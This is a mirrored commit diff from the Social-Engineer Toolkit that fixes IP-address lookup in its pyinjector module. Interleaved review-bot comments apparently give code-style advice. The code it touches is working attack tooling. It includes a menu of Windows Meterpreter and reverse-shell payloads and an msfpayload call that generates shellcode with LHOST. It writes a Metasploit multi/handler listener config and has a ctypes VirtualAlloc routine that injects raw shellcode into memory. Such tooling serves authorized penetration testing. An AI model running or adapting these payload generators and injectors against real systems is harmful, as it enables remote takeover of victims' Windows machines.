mirror of
https://github.com/trustedsec/social-engineer-toolkit
synced 2025-03-17 15:27:00 +00:00
Fixed a few bugs causing pyinjector not to load ipaddr
parent
77df976186
commit
f5f3bcbd18
4 changed files with 14 additions and 7 deletions
|
@ -383,6 +383,10 @@ try:
|
|||
if choice9 == "4":
|
||||
choice9 = "windows/meterpreter/reverse_tcp_allports"
|
||||
|
||||
if ipaddr == "":
|
||||
# grab ipaddr if not defined
|
||||
ipaddr = check_options("IPADDR=")
|
||||
|
||||
if choice1 == "shellcode/alphanum":
|
||||
print_status("Generating the payload via msfpayload and generating alphanumeric shellcode...")
|
||||
subprocess.Popen("ruby %s/msfpayload %s LHOST=%s %s EXITFUNC=thread R > %s/meterpreter.raw" % (path,choice9,choice2,portnum,setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
|
||||
|
@ -395,8 +399,7 @@ try:
|
|||
if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)):
|
||||
os.remove("%s/meta_config_multipyinjector" % (setdir))
|
||||
while 1:
|
||||
|
||||
|
||||
|
||||
if choice1 == "shellcode/multipyinject":
|
||||
print ("\nSelect the payload you want to deliver via shellcode injection\n\n 1) Windows Meterpreter Reverse TCP\n 2) Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager\n 3) Windows Meterpreter (Reflective Injection) Reverse HTTP Stager\n 4) Windows Meterpreter (ALL PORTS) Reverse TCP\n 5) Windows Reverse Command Shell\n 6) I'm finished adding payloads.\n")
|
||||
choice9 = raw_input(setprompt(["4"], "Enter the number for the payload [meterpreter_reverse_tcp]"))
|
||||
|
@ -414,7 +417,11 @@ try:
|
|||
choice9 = "windows/meterpreter/reverse_tcp_allports"
|
||||
if choice9 == "5":
|
||||
choice9 = "windows/shell/reverse_tcp"
|
||||
# break out of loop, no longer needed
|
||||
# check the ipaddr
|
||||
if ipaddr == "":
|
||||
# grab ipaddr if not defined
|
||||
ipaddr = check_options("IPADDR=")
|
||||
# break out if not needed
|
||||
if choice9 == "6": break
|
||||
shellcode_port = raw_input(setprompt(["4"], "Enter the port number [443]"))
|
||||
if shellcode_port == "": shellcode_port = "443"
|
||||
|
@ -422,9 +429,6 @@ try:
|
|||
# here we prep our meta config to listen on all the ports we want - free hugs all around
|
||||
filewrite = file("%s/meta_config_multipyinjector" % (setdir), "a")
|
||||
port_check = check_ports("%s/meta_config_multipyinjector" % (setdir), shellcode_port)
|
||||
if ipaddr == "":
|
||||
# grab ipaddr if not defined
|
||||
ipaddr = check_options("IPADDR=")
|
||||
if port_check == False:
|
||||
filewrite.write("use exploit/multi/handler\nset PAYLOAD %s\nset EnableStageEncoding true\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nset EnableStageEncoding true\nexploit -j\n\n" % (choice9, ipaddr, shellcode_port))
|
||||
filewrite.close()
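Review bot: The `if ipaddr == "":` / `ipaddr = check_options("IPADDR=")` lookup now appears twice in this file, once ahead of the `shellcode/alphanum` branch and once inside the `while 1:` payload loop, where it sits before `if choice9 == "6": break` and so also runs on the iteration that only exits. Resolving the address once before the loop, for example `if not ipaddr: ipaddr = check_options("IPADDR=")`, would remove the duplication. The value returned by `check_options` is formatted straight into `set LHOST %s` in the meta_config file; what it returns when IPADDR is unset is not visible here, so it would be worth confirming it is a non-empty single-line string before writing it. The enclosing `try:` block starts outside these hunks.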
|
||||
|
|
|
@ -22,6 +22,9 @@ import threading
|
|||
def injection(sc):
|
||||
sc = sc.decode("string_escape")
|
||||
sc = bytearray(sc)
|
||||
# Initial awesome code and credit found here:
|
||||
# http://www.debasish.in/2012_04_01_archive.html
|
||||
|
||||
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
|
||||
ctypes.c_int(len(sc)),
|
||||
ctypes.c_int(0x3000),
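Review bot: The added credit comment records where the routine came from, but the `VirtualAlloc` call directly below it still passes the bare constant `0x3000`. A short comment such as `# 0x3000 = MEM_COMMIT | MEM_RESERVE` would let a maintainer, or an analyst triaging this file, read the allocation type without looking it up. The same call with the same constant appears in the last file section of this commit. The credit URL is a monthly blog archive over plain http, so a permalink to the specific post would age better. The `injection` function continues past the end of the hunk.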
|
||||
|
|
BIN
src/payloads/set_payloads/pyinjector.binary
Executable file → Normal file
BIN
src/payloads/set_payloads/pyinjector.binary
Executable file → Normal file
Binary file not shown.
|
@ -21,7 +21,7 @@ sc = sc.decode("string_escape")
|
|||
# convert to bytearray
|
||||
sc = bytearray(sc)
|
||||
|
||||
# use types windll.kernel32 for virtualalloc reserves region of pages in virtual addres sspace
|
||||
# use types windll.kernel32 for virtualalloc reserves region of pages in virtual address space
|
||||
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
|
||||
ctypes.c_int(len(sc)),
|
||||
ctypes.c_int(0x3000),
|
||||
|
|